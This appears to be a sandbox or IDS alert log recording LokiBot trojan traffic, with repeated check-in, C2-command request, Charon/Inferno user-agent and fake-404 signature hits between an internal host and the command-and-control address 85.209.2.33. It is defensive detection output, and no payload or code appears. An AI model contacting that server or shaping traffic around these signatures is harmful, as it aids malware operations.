                                                            12/01/21-20:22:49.717816TCP2025381ET TROJAN LokiBot Checkin4995080192.168.11.2085.209.2.33
                                                            12/01/21-20:22:49.717816TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995080192.168.11.2085.209.2.33
                                                            12/01/21-20:22:50.624165TCP2025483ET TROJAN LokiBot Fake 404 Response804995085.209.2.33192.168.11.20
                                                            12/01/21-20:22:51.064965TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995180192.168.11.2085.209.2.33
                                                            12/01/21-20:22:51.064965TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995180192.168.11.2085.209.2.33
                                                            12/01/21-20:22:51.064965TCP2025381ET TROJAN LokiBot Checkin4995180192.168.11.2085.209.2.33
                                                            12/01/21-20:22:51.064965TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995180192.168.11.2085.209.2.33
                                                            12/01/21-20:22:51.759178TCP2025483ET TROJAN LokiBot Fake 404 Response804995185.209.2.33192.168.11.20
                                                            12/01/21-20:22:52.204658TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995280192.168.11.2085.209.2.33
                                                            12/01/21-20:22:52.204658TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995280192.168.11.2085.209.2.33
                                                            12/01/21-20:22:52.204658TCP2025381ET TROJAN LokiBot Checkin4995280192.168.11.2085.209.2.33
                                                            12/01/21-20:22:52.204658TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995280192.168.11.2085.209.2.33
                                                            12/01/21-20:22:53.023082TCP2025483ET TROJAN LokiBot Fake 404 Response804995285.209.2.33192.168.11.20
                                                            12/01/21-20:22:53.473581TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995380192.168.11.2085.209.2.33
                                                            12/01/21-20:22:53.473581TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995380192.168.11.2085.209.2.33
                                                            12/01/21-20:22:53.473581TCP2025381ET TROJAN LokiBot Checkin4995380192.168.11.2085.209.2.33
                                                            12/01/21-20:22:53.473581TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995380192.168.11.2085.209.2.33
                                                            12/01/21-20:22:54.418345TCP2025483ET TROJAN LokiBot Fake 404 Response804995385.209.2.33192.168.11.20
                                                            12/01/21-20:22:54.849182TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995480192.168.11.2085.209.2.33
                                                            12/01/21-20:22:54.849182TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995480192.168.11.2085.209.2.33
                                                            12/01/21-20:22:54.849182TCP2025381ET TROJAN LokiBot Checkin4995480192.168.11.2085.209.2.33
                                                            12/01/21-20:22:54.849182TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995480192.168.11.2085.209.2.33
                                                            12/01/21-20:22:55.573376TCP2025483ET TROJAN LokiBot Fake 404 Response804995485.209.2.33192.168.11.20
                                                            12/01/21-20:22:55.998149TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995580192.168.11.2085.209.2.33
                                                            12/01/21-20:22:55.998149TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995580192.168.11.2085.209.2.33
                                                            12/01/21-20:22:55.998149TCP2025381ET TROJAN LokiBot Checkin4995580192.168.11.2085.209.2.33
                                                            12/01/21-20:22:55.998149TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995580192.168.11.2085.209.2.33
                                                            12/01/21-20:22:56.713738TCP2025483ET TROJAN LokiBot Fake 404 Response804995585.209.2.33192.168.11.20
                                                            12/01/21-20:22:57.145462TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995680192.168.11.2085.209.2.33
                                                            12/01/21-20:22:57.145462TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995680192.168.11.2085.209.2.33
                                                            12/01/21-20:22:57.145462TCP2025381ET TROJAN LokiBot Checkin4995680192.168.11.2085.209.2.33
                                                            12/01/21-20:22:57.145462TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995680192.168.11.2085.209.2.33
                                                            12/01/21-20:22:57.869062TCP2025483ET TROJAN LokiBot Fake 404 Response804995685.209.2.33192.168.11.20
                                                            12/01/21-20:22:58.308173TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995780192.168.11.2085.209.2.33
                                                            12/01/21-20:22:58.308173TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995780192.168.11.2085.209.2.33
                                                            12/01/21-20:22:58.308173TCP2025381ET TROJAN LokiBot Checkin4995780192.168.11.2085.209.2.33
                                                            12/01/21-20:22:58.308173TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995780192.168.11.2085.209.2.33
                                                            12/01/21-20:22:59.176569TCP2025483ET TROJAN LokiBot Fake 404 Response804995785.209.2.33192.168.11.20
                                                            12/01/21-20:22:59.616324TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995880192.168.11.2085.209.2.33
                                                            12/01/21-20:22:59.616324TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995880192.168.11.2085.209.2.33
                                                            12/01/21-20:22:59.616324TCP2025381ET TROJAN LokiBot Checkin4995880192.168.11.2085.209.2.33
                                                            12/01/21-20:22:59.616324TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995880192.168.11.2085.209.2.33
                                                            12/01/21-20:23:03.569165TCP2025483ET TROJAN LokiBot Fake 404 Response804995885.209.2.33192.168.11.20
                                                            12/01/21-20:23:03.993762TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996080192.168.11.2085.209.2.33
                                                            12/01/21-20:23:03.993762TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996080192.168.11.2085.209.2.33
                                                            12/01/21-20:23:03.993762TCP2025381ET TROJAN LokiBot Checkin4996080192.168.11.2085.209.2.33
                                                            12/01/21-20:23:03.993762TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996080192.168.11.2085.209.2.33
                                                            12/01/21-20:23:04.914706TCP2025483ET TROJAN LokiBot Fake 404 Response804996085.209.2.33192.168.11.20
                                                            12/01/21-20:23:05.313045TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996180192.168.11.2085.209.2.33
                                                            12/01/21-20:23:05.313045TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996180192.168.11.2085.209.2.33
                                                            12/01/21-20:23:05.313045TCP2025381ET TROJAN LokiBot Checkin4996180192.168.11.2085.209.2.33
                                                            12/01/21-20:23:05.313045TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996180192.168.11.2085.209.2.33
                                                            12/01/21-20:23:06.145976TCP2025483ET TROJAN LokiBot Fake 404 Response804996185.209.2.33192.168.11.20
                                                            12/01/21-20:23:06.576290TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996280192.168.11.2085.209.2.33
                                                            12/01/21-20:23:06.576290TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996280192.168.11.2085.209.2.33
                                                            12/01/21-20:23:06.576290TCP2025381ET TROJAN LokiBot Checkin4996280192.168.11.2085.209.2.33
                                                            12/01/21-20:23:06.576290TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996280192.168.11.2085.209.2.33
                                                            12/01/21-20:23:07.259845TCP2025483ET TROJAN LokiBot Fake 404 Response804996285.209.2.33192.168.11.20
                                                            12/01/21-20:23:07.699177TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996380192.168.11.2085.209.2.33
                                                            12/01/21-20:23:07.699177TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996380192.168.11.2085.209.2.33
                                                            12/01/21-20:23:07.699177TCP2025381ET TROJAN LokiBot Checkin4996380192.168.11.2085.209.2.33
                                                            12/01/21-20:23:07.699177TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996380192.168.11.2085.209.2.33
                                                            12/01/21-20:23:08.604315TCP2025483ET TROJAN LokiBot Fake 404 Response804996385.209.2.33192.168.11.20
                                                            12/01/21-20:23:09.033299TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996480192.168.11.2085.209.2.33
                                                            12/01/21-20:23:09.033299TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996480192.168.11.2085.209.2.33
                                                            12/01/21-20:23:09.033299TCP2025381ET TROJAN LokiBot Checkin4996480192.168.11.2085.209.2.33
                                                            12/01/21-20:23:09.033299TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996480192.168.11.2085.209.2.33
                                                            12/01/21-20:23:09.948392TCP2025483ET TROJAN LokiBot Fake 404 Response804996485.209.2.33192.168.11.20
                                                            12/01/21-20:23:10.385263TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996580192.168.11.2085.209.2.33
                                                            12/01/21-20:23:10.385263TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996580192.168.11.2085.209.2.33
                                                            12/01/21-20:23:10.385263TCP2025381ET TROJAN LokiBot Checkin4996580192.168.11.2085.209.2.33
                                                            12/01/21-20:23:10.385263TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996580192.168.11.2085.209.2.33
                                                            12/01/21-20:23:11.206659TCP2025483ET TROJAN LokiBot Fake 404 Response804996585.209.2.33192.168.11.20
                                                            12/01/21-20:23:11.628635TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996680192.168.11.2085.209.2.33
                                                            12/01/21-20:23:11.628635TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996680192.168.11.2085.209.2.33
                                                            12/01/21-20:23:11.628635TCP2025381ET TROJAN LokiBot Checkin4996680192.168.11.2085.209.2.33
                                                            12/01/21-20:23:11.628635TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996680192.168.11.2085.209.2.33
                                                            12/01/21-20:23:12.337683TCP2025483ET TROJAN LokiBot Fake 404 Response804996685.209.2.33192.168.11.20
                                                            12/01/21-20:23:12.770547TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996780192.168.11.2085.209.2.33
                                                            12/01/21-20:23:12.770547TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996780192.168.11.2085.209.2.33
                                                            12/01/21-20:23:12.770547TCP2025381ET TROJAN LokiBot Checkin4996780192.168.11.2085.209.2.33
                                                            12/01/21-20:23:12.770547TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996780192.168.11.2085.209.2.33
                                                            12/01/21-20:23:13.450840TCP2025483ET TROJAN LokiBot Fake 404 Response804996785.209.2.33192.168.11.20
                                                            12/01/21-20:23:13.779894TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996880192.168.11.2085.209.2.33
                                                            12/01/21-20:23:13.779894TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996880192.168.11.2085.209.2.33
                                                            12/01/21-20:23:13.779894TCP2025381ET TROJAN LokiBot Checkin4996880192.168.11.2085.209.2.33
                                                            12/01/21-20:23:13.779894TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996880192.168.11.2085.209.2.33
                                                            12/01/21-20:23:14.614384TCP2025483ET TROJAN LokiBot Fake 404 Response804996885.209.2.33192.168.11.20
                                                            12/01/21-20:23:15.047795TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996980192.168.11.2085.209.2.33
                                                            12/01/21-20:23:15.047795TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996980192.168.11.2085.209.2.33
                                                            12/01/21-20:23:15.047795TCP2025381ET TROJAN LokiBot Checkin4996980192.168.11.2085.209.2.33
                                                            12/01/21-20:23:15.047795TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996980192.168.11.2085.209.2.33
                                                            12/01/21-20:23:15.754844TCP2025483ET TROJAN LokiBot Fake 404 Response804996985.209.2.33192.168.11.20
                                                            12/01/21-20:23:16.167556TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997080192.168.11.2085.209.2.33
                                                            12/01/21-20:23:16.167556TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997080192.168.11.2085.209.2.33
                                                            12/01/21-20:23:16.167556TCP2025381ET TROJAN LokiBot Checkin4997080192.168.11.2085.209.2.33
                                                            12/01/21-20:23:16.167556TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997080192.168.11.2085.209.2.33
                                                            12/01/21-20:23:17.034291TCP2025483ET TROJAN LokiBot Fake 404 Response804997085.209.2.33192.168.11.20
                                                            12/01/21-20:23:17.474785TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997180192.168.11.2085.209.2.33
                                                            12/01/21-20:23:17.474785TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997180192.168.11.2085.209.2.33
                                                            12/01/21-20:23:17.474785TCP2025381ET TROJAN LokiBot Checkin4997180192.168.11.2085.209.2.33
                                                            12/01/21-20:23:17.474785TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997180192.168.11.2085.209.2.33
                                                            12/01/21-20:23:18.350001TCP2025483ET TROJAN LokiBot Fake 404 Response804997185.209.2.33192.168.11.20
                                                            12/01/21-20:23:18.775018TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997280192.168.11.2085.209.2.33
                                                            12/01/21-20:23:18.775018TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997280192.168.11.2085.209.2.33
                                                            12/01/21-20:23:18.775018TCP2025381ET TROJAN LokiBot Checkin4997280192.168.11.2085.209.2.33
                                                            12/01/21-20:23:18.775018TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997280192.168.11.2085.209.2.33
                                                            12/01/21-20:23:19.630097TCP2025483ET TROJAN LokiBot Fake 404 Response804997285.209.2.33192.168.11.20
                                                            12/01/21-20:23:20.068362TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997380192.168.11.2085.209.2.33
                                                            12/01/21-20:23:20.068362TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997380192.168.11.2085.209.2.33
                                                            12/01/21-20:23:20.068362TCP2025381ET TROJAN LokiBot Checkin4997380192.168.11.2085.209.2.33
                                                            12/01/21-20:23:20.068362TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997380192.168.11.2085.209.2.33
                                                            12/01/21-20:23:20.957073TCP2025483ET TROJAN LokiBot Fake 404 Response804997385.209.2.33192.168.11.20
                                                            12/01/21-20:23:21.400439TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997480192.168.11.2085.209.2.33
                                                            12/01/21-20:23:21.400439TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997480192.168.11.2085.209.2.33
                                                            12/01/21-20:23:21.400439TCP2025381ET TROJAN LokiBot Checkin4997480192.168.11.2085.209.2.33
                                                            12/01/21-20:23:21.400439TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997480192.168.11.2085.209.2.33
                                                            12/01/21-20:23:22.357130TCP2025483ET TROJAN LokiBot Fake 404 Response804997485.209.2.33192.168.11.20
                                                            12/01/21-20:23:22.802655TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997580192.168.11.2085.209.2.33
                                                            12/01/21-20:23:22.802655TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997580192.168.11.2085.209.2.33
                                                            12/01/21-20:23:22.802655TCP2025381ET TROJAN LokiBot Checkin4997580192.168.11.2085.209.2.33
                                                            12/01/21-20:23:22.802655TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997580192.168.11.2085.209.2.33
                                                            12/01/21-20:23:23.711418TCP2025483ET TROJAN LokiBot Fake 404 Response804997585.209.2.33192.168.11.20
                                                            12/01/21-20:23:24.144601TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997680192.168.11.2085.209.2.33
                                                            12/01/21-20:23:24.144601TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997680192.168.11.2085.209.2.33
                                                            12/01/21-20:23:24.144601TCP2025381ET TROJAN LokiBot Checkin4997680192.168.11.2085.209.2.33
                                                            12/01/21-20:23:24.144601TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997680192.168.11.2085.209.2.33
                                                            12/01/21-20:23:24.994161TCP2025483ET TROJAN LokiBot Fake 404 Response804997685.209.2.33192.168.11.20
                                                            12/01/21-20:23:25.353266TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997780192.168.11.2085.209.2.33
                                                            12/01/21-20:23:25.353266TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997780192.168.11.2085.209.2.33
                                                            12/01/21-20:23:25.353266TCP2025381ET TROJAN LokiBot Checkin4997780192.168.11.2085.209.2.33
                                                            12/01/21-20:23:25.353266TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997780192.168.11.2085.209.2.33
                                                            12/01/21-20:23:26.246430TCP2025483ET TROJAN LokiBot Fake 404 Response804997785.209.2.33192.168.11.20
                                                            12/01/21-20:23:26.634232TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997880192.168.11.2085.209.2.33
                                                            12/01/21-20:23:26.634232TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997880192.168.11.2085.209.2.33
                                                            12/01/21-20:23:26.634232TCP2025381ET TROJAN LokiBot Checkin4997880192.168.11.2085.209.2.33
                                                            12/01/21-20:23:26.634232TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997880192.168.11.2085.209.2.33
                                                            12/01/21-20:23:28.964050TCP2025483ET TROJAN LokiBot Fake 404 Response804997885.209.2.33192.168.11.20
                                                            12/01/21-20:23:29.420886TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997980192.168.11.2085.209.2.33
                                                            12/01/21-20:23:29.420886TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997980192.168.11.2085.209.2.33
                                                            12/01/21-20:23:29.420886TCP2025381ET TROJAN LokiBot Checkin4997980192.168.11.2085.209.2.33
                                                            12/01/21-20:23:29.420886TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997980192.168.11.2085.209.2.33
                                                            12/01/21-20:23:30.326535TCP2025483ET TROJAN LokiBot Fake 404 Response804997985.209.2.33192.168.11.20
                                                            12/01/21-20:23:30.775887TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998080192.168.11.2085.209.2.33
                                                            12/01/21-20:23:30.775887TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998080192.168.11.2085.209.2.33
                                                            12/01/21-20:23:30.775887TCP2025381ET TROJAN LokiBot Checkin4998080192.168.11.2085.209.2.33
                                                            12/01/21-20:23:30.775887TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998080192.168.11.2085.209.2.33
                                                            12/01/21-20:23:31.648202TCP2025483ET TROJAN LokiBot Fake 404 Response804998085.209.2.33192.168.11.20
                                                            12/01/21-20:23:32.069018TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998180192.168.11.2085.209.2.33
                                                            12/01/21-20:23:32.069018TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998180192.168.11.2085.209.2.33
                                                            12/01/21-20:23:32.069018TCP2025381ET TROJAN LokiBot Checkin4998180192.168.11.2085.209.2.33
                                                            12/01/21-20:23:32.069018TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998180192.168.11.2085.209.2.33
                                                            12/01/21-20:23:33.023922TCP2025483ET TROJAN LokiBot Fake 404 Response804998185.209.2.33192.168.11.20
                                                            12/01/21-20:23:33.364687TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998280192.168.11.2085.209.2.33
                                                            12/01/21-20:23:33.364687TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998280192.168.11.2085.209.2.33
                                                            12/01/21-20:23:33.364687TCP2025381ET TROJAN LokiBot Checkin4998280192.168.11.2085.209.2.33
                                                            12/01/21-20:23:33.364687TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998280192.168.11.2085.209.2.33
                                                            12/01/21-20:23:34.175675TCP2025483ET TROJAN LokiBot Fake 404 Response804998285.209.2.33192.168.11.20
                                                            12/01/21-20:23:34.611338TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998380192.168.11.2085.209.2.33
                                                            12/01/21-20:23:34.611338TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998380192.168.11.2085.209.2.33
                                                            12/01/21-20:23:34.611338TCP2025381ET TROJAN LokiBot Checkin4998380192.168.11.2085.209.2.33
                                                            12/01/21-20:23:34.611338TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998380192.168.11.2085.209.2.33
                                                            12/01/21-20:23:35.273934TCP2025483ET TROJAN LokiBot Fake 404 Response804998385.209.2.33192.168.11.20
                                                            12/01/21-20:23:35.654515TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998480192.168.11.2085.209.2.33
                                                            12/01/21-20:23:35.654515TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998480192.168.11.2085.209.2.33
                                                            12/01/21-20:23:35.654515TCP2025381ET TROJAN LokiBot Checkin4998480192.168.11.2085.209.2.33
                                                            12/01/21-20:23:35.654515TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998480192.168.11.2085.209.2.33
                                                            12/01/21-20:23:36.355927TCP2025483ET TROJAN LokiBot Fake 404 Response804998485.209.2.33192.168.11.20
                                                            12/01/21-20:23:36.729026TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998580192.168.11.2085.209.2.33
                                                            12/01/21-20:23:36.729026TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998580192.168.11.2085.209.2.33
                                                            12/01/21-20:23:36.729026TCP2025381ET TROJAN LokiBot Checkin4998580192.168.11.2085.209.2.33
                                                            12/01/21-20:23:36.729026TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998580192.168.11.2085.209.2.33
                                                            12/01/21-20:23:37.535293TCP2025483ET TROJAN LokiBot Fake 404 Response804998585.209.2.33192.168.11.20
                                                            12/01/21-20:23:37.969485TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998680192.168.11.2085.209.2.33
                                                            12/01/21-20:23:37.969485TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998680192.168.11.2085.209.2.33
                                                            12/01/21-20:23:37.969485TCP2025381ET TROJAN LokiBot Checkin4998680192.168.11.2085.209.2.33
                                                            12/01/21-20:23:37.969485TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998680192.168.11.2085.209.2.33
                                                            12/01/21-20:23:38.949686TCP2025483ET TROJAN LokiBot Fake 404 Response804998685.209.2.33192.168.11.20
                                                            12/01/21-20:23:39.348961TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998780192.168.11.2085.209.2.33
                                                            12/01/21-20:23:39.348961TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998780192.168.11.2085.209.2.33
                                                            12/01/21-20:23:39.348961TCP2025381ET TROJAN LokiBot Checkin4998780192.168.11.2085.209.2.33
                                                            12/01/21-20:23:39.348961TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998780192.168.11.2085.209.2.33
                                                            12/01/21-20:23:40.084940TCP2025483ET TROJAN LokiBot Fake 404 Response804998785.209.2.33192.168.11.20
                                                            12/01/21-20:23:40.523249TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998880192.168.11.2085.209.2.33
                                                            12/01/21-20:23:40.523249TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998880192.168.11.2085.209.2.33
                                                            12/01/21-20:23:40.523249TCP2025381ET TROJAN LokiBot Checkin4998880192.168.11.2085.209.2.33
                                                            12/01/21-20:23:40.523249TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998880192.168.11.2085.209.2.33
                                                            12/01/21-20:23:41.387054TCP2025483ET TROJAN LokiBot Fake 404 Response804998885.209.2.33192.168.11.20
                                                            12/01/21-20:23:41.748873TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998980192.168.11.2085.209.2.33
                                                            12/01/21-20:23:41.748873TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998980192.168.11.2085.209.2.33
                                                            12/01/21-20:23:41.748873TCP2025381ET TROJAN LokiBot Checkin4998980192.168.11.2085.209.2.33
                                                            12/01/21-20:23:41.748873TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998980192.168.11.2085.209.2.33
                                                            12/01/21-20:23:42.662741TCP2025483ET TROJAN LokiBot Fake 404 Response804998985.209.2.33192.168.11.20
                                                            12/01/21-20:23:43.085664TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999080192.168.11.2085.209.2.33
                                                            12/01/21-20:23:43.085664TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999080192.168.11.2085.209.2.33
                                                            12/01/21-20:23:43.085664TCP2025381ET TROJAN LokiBot Checkin4999080192.168.11.2085.209.2.33
                                                            12/01/21-20:23:43.085664TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999080192.168.11.2085.209.2.33
                                                            12/01/21-20:23:43.840302TCP2025483ET TROJAN LokiBot Fake 404 Response804999085.209.2.33192.168.11.20
                                                            12/01/21-20:23:44.272806TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999180192.168.11.2085.209.2.33
                                                            12/01/21-20:23:44.272806TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999180192.168.11.2085.209.2.33
                                                            12/01/21-20:23:44.272806TCP2025381ET TROJAN LokiBot Checkin4999180192.168.11.2085.209.2.33
                                                            12/01/21-20:23:44.272806TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999180192.168.11.2085.209.2.33
                                                            12/01/21-20:23:45.181751TCP2025483ET TROJAN LokiBot Fake 404 Response804999185.209.2.33192.168.11.20
                                                            12/01/21-20:23:45.616646TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999280192.168.11.2085.209.2.33
                                                            12/01/21-20:23:45.616646TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999280192.168.11.2085.209.2.33
                                                            12/01/21-20:23:45.616646TCP2025381ET TROJAN LokiBot Checkin4999280192.168.11.2085.209.2.33
                                                            12/01/21-20:23:45.616646TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999280192.168.11.2085.209.2.33
                                                            12/01/21-20:23:46.465575TCP2025483ET TROJAN LokiBot Fake 404 Response804999285.209.2.33192.168.11.20
                                                            12/01/21-20:23:46.909039TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999380192.168.11.2085.209.2.33
                                                            12/01/21-20:23:46.909039TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999380192.168.11.2085.209.2.33
                                                            12/01/21-20:23:46.909039TCP2025381ET TROJAN LokiBot Checkin4999380192.168.11.2085.209.2.33
                                                            12/01/21-20:23:46.909039TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999380192.168.11.2085.209.2.33
                                                            12/01/21-20:23:47.634791TCP2025483ET TROJAN LokiBot Fake 404 Response804999385.209.2.33192.168.11.20
                                                            12/01/21-20:23:48.079897TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999480192.168.11.2085.209.2.33
                                                            12/01/21-20:23:48.079897TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999480192.168.11.2085.209.2.33
                                                            12/01/21-20:23:48.079897TCP2025381ET TROJAN LokiBot Checkin4999480192.168.11.2085.209.2.33
                                                            12/01/21-20:23:48.079897TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999480192.168.11.2085.209.2.33
                                                            12/01/21-20:23:49.000531TCP2025483ET TROJAN LokiBot Fake 404 Response804999485.209.2.33192.168.11.20
                                                            12/01/21-20:23:49.437305TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999580192.168.11.2085.209.2.33
                                                            12/01/21-20:23:49.437305TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999580192.168.11.2085.209.2.33
                                                            12/01/21-20:23:49.437305TCP2025381ET TROJAN LokiBot Checkin4999580192.168.11.2085.209.2.33
                                                            12/01/21-20:23:49.437305TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999580192.168.11.2085.209.2.33
                                                            12/01/21-20:23:50.316671TCP2025483ET TROJAN LokiBot Fake 404 Response804999585.209.2.33192.168.11.20
                                                            12/01/21-20:23:50.739279TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999680192.168.11.2085.209.2.33
                                                            12/01/21-20:23:50.739279TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999680192.168.11.2085.209.2.33
                                                            12/01/21-20:23:50.739279TCP2025381ET TROJAN LokiBot Checkin4999680192.168.11.2085.209.2.33
                                                            12/01/21-20:23:50.739279TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999680192.168.11.2085.209.2.33
                                                            12/01/21-20:23:51.648807TCP2025483ET TROJAN LokiBot Fake 404 Response804999685.209.2.33192.168.11.20
                                                            12/01/21-20:23:52.090071TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999780192.168.11.2085.209.2.33
                                                            12/01/21-20:23:52.090071TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999780192.168.11.2085.209.2.33
                                                            12/01/21-20:23:52.090071TCP2025381ET TROJAN LokiBot Checkin4999780192.168.11.2085.209.2.33
                                                            12/01/21-20:23:52.090071TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999780192.168.11.2085.209.2.33
                                                            12/01/21-20:23:52.901419TCP2025483ET TROJAN LokiBot Fake 404 Response804999785.209.2.33192.168.11.20
